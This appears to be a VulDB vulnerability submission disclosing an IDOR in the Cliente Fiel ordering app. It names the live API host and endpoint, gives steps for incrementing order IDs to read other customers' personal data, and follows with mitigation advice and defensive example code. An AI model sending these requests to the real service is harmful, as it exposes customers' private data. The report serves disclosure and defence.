Submission #544136: FCJ Venture Builder appclientefiel 3.0.27 Insecure Direct Object Reference (IDOR) Exposing Sensitive Data

Information

Title: FCJ Venture Builder appclientefiel 3.0.27 Insecure Direct Object Reference (IDOR) Exposing Sensitive Data
Description:

Proof of Concept (PoC) - IDOR in the Cliente Fiel App
LINK OF PoC: https://drive.google.com/file/d/1yhZiKFX0avpLDsYDlbnmmkTk4XTY8Y2h/view?usp=sharing

System Description
The Cliente Fiel App is a solution developed by FCJ Venture Builder (www.fcjventurebuilder.com) for managing interactions between businesses and their customers. It offers functionalities such as order placement, account history review, and data management, promoting a personalized and seamless experience. More information about the system can be found on the official website of FCJ Venture Builder: www.fcjventurebuilder.com.

Initial Information
An IDOR (Insecure Direct Object Reference) vulnerability has been identified in the Cliente Fiel App, allowing authenticated users to access sensitive information belonging to other users. This flaw compromises data privacy and system security and violates regulations such as LGPD and GDPR.

Initial Research
Vulnerable endpoint identified:

    GET /rest/cliente/ObterPedido/{ORDER_ID} HTTP/1.1
    Host: wapi.appclientefiel.com.br
    Authorization: Bearer <authentication_token>

The vulnerability arises from the absence of authorization validation for the {ORDER_ID} parameter: the server checks that the caller is authenticated, but not that the requested order belongs to that caller.

Vulnerability Details
Type: IDOR (Insecure Direct Object Reference)
Impact:
- Privacy: Exposure of personal and sensitive data, such as name, CPF (Brazilian Individual Taxpayer Registry), address, phone number, and order details of customers.
- Compliance:
  - LGPD (General Data Protection Law): Violates the security principle (Article 46) and the necessity principle (Article 6, Clause III), exposing the company to administrative sanctions under Article 52, including fines of up to 2% of annual revenue, capped at R$50 million per violation.
  - GDPR (General Data Protection Regulation): Breaches Articles 5 (Principles Relating to Personal Data Processing) and 32 (Security of Processing), exposing the company to fines of up to €20 million or 4% of global annual revenue, whichever is higher.
- Operational Security: Potential misuse of exposed information for fraud, phishing, or abuse.
Severity: High

Exploitation Steps
1. System Access: Log into the system using valid credentials provided by the establishment.
2. Identifying the Vulnerable Endpoint: After logging in, access the orders section and inspect the requests made by the software. Use tools like Burp Suite or OWASP ZAP to capture the requests and identify the parameters sent to the server. Observed request:

    GET /rest/cliente/ObterPedido/14760721 HTTP/1.1
    Host: wapi.appclientefiel.com.br
    Authorization: Bearer <authentication_token>

3. Parameter Manipulation: Identify the vulnerable parameter in the URL (/ObterPedido/{ORDER_ID}). Change the order ID value (14760721) to another valid numeric identifier (e.g., 14760722). Send the modified request to the server.
4. Verification of Exploitation: If the server's response contains details of another user's order, the vulnerability is confirmed. Example of response:

    {
      "idPedido": 14760722,
      "cliente": {
        "nome": "João Silva",
        "cpf": "123.456.789-10",
        "endereco": "Rua Example, 123",
        "telefone": "(11) 98765-4321"
      },
      "itens": [
        { "produto": "Pepperoni Pizza", "quantidade": 1, "valor": 45.90 }
      ],
      "valorTotal": 45.90
    }

Mitigation Recommendations
To address this vulnerability and ensure compliance with LGPD and GDPR, the following measures are recommended:
- Authorization Validation: Implement backend checks to ensure that only the data owner can access resources linked to their identifier.
- Use of Secure Identifiers: Replace sequential identifiers with UUIDs (Universally Unique Identifiers) or cryptographically secure identifiers.
- Token Association: Associate orders exclusively with the authenticated customer using secure tokens.
- Encryption and Logging: Apply encryption to protect data in transit and implement robust logging to monitor suspicious access.
- Regular Audits: Conduct periodic security audits and penetration tests to identify and address similar flaws.

Conclusion
The IDOR vulnerability in the Cliente Fiel App represents a severe security flaw, exposing the company to regulatory sanctions and operational risks. Immediate implementation of the mitigation measures described is essential to ensure compliance with LGPD and GDPR, as well as to protect user data and the company's reputation.
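The ownership check, opaque identifiers and logging recommended above, as an added Python example that is not the Cliente Fiel App's code: it contrasts a lookup that only authenticates the caller (the pattern this report describes) with one that also validates that the order belongs to the authenticated customer, maps random UUIDs onto the internal sequential ids, and flags customers whose denied lookups suggest id probing. Tokens, customer ids, orders and function names are constructed for illustration.

```python
# Added example, not the Cliente Fiel App's code: a minimal order lookup showing the
# pattern the report describes beside one enforcing the recommended checks.
# Tokens, customer ids and orders below are constructed for illustration.
import uuid
from collections import Counter

SESSIONS = {"token-alice": 1001, "token-bob": 1002}   # bearer token -> customer id
ORDERS = {   # sequential idPedido -> order record
    14760721: {"customer_id": 1001, "itens": [{"produto": "Pepperoni Pizza", "valor": 45.90}]},
    14760722: {"customer_id": 1002, "itens": [{"produto": "Salad", "valor": 20.00}]},
}
AUDIT_LOG = []   # denied lookups, kept so probing can be detected

def customer_from_token(token):
    """Authentication only: map a bearer token to the calling customer."""
    customer = SESSIONS.get(token)
    if customer is None:
        raise PermissionError("invalid token")
    return customer

def obter_pedido_vulnerable(token, order_id):
    """Authenticates the caller, then returns any order by its id: the IDOR pattern."""
    customer_from_token(token)
    return ORDERS.get(order_id)

def obter_pedido_fixed(token, order_id):
    """Authorization validation: the order must belong to the authenticated customer.
    A mismatch is logged and answered like a missing order, so the response does
    not reveal whether another customer's order id exists."""
    caller = customer_from_token(token)
    order = ORDERS.get(order_id)
    if order is None or order["customer_id"] != caller:
        AUDIT_LOG.append({"customer": caller, "order_id": order_id, "result": "denied"})
        return None
    return order

# Secure identifiers: expose random UUIDs instead of sequential ids so they cannot be
# guessed. This narrows enumeration; the ownership check above is still required.
PUBLIC_IDS = {str(uuid.uuid4()): oid for oid in ORDERS}

def obter_pedido_by_public_id(token, public_id):
    internal_id = PUBLIC_IDS.get(public_id)
    return None if internal_id is None else obter_pedido_fixed(token, internal_id)

def suspicious_customers(min_denials):
    """Monitoring: customers whose denied lookups reach the threshold (id probing)."""
    counts = Counter(entry["customer"] for entry in AUDIT_LOG)
    return sorted(c for c, n in counts.items() if n >= min_denials)
```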
Source: ⚠️ https://xxxx.com.br/rest/cliente/ObterPedido/14760721
User: Samuel Jesus (UID 81288)
Submitted: 27/03/2025 02:37 PM (1 year ago)
Moderation: 07/04/2025 12:28 PM (11 days later)
Status: Approved
VulDB entry: 303649 [FCJ Venture Builder appclientefiel 3.0.27 HTTP GET Request ObterPedido ORDER_ID authorization bypass]
Points: 20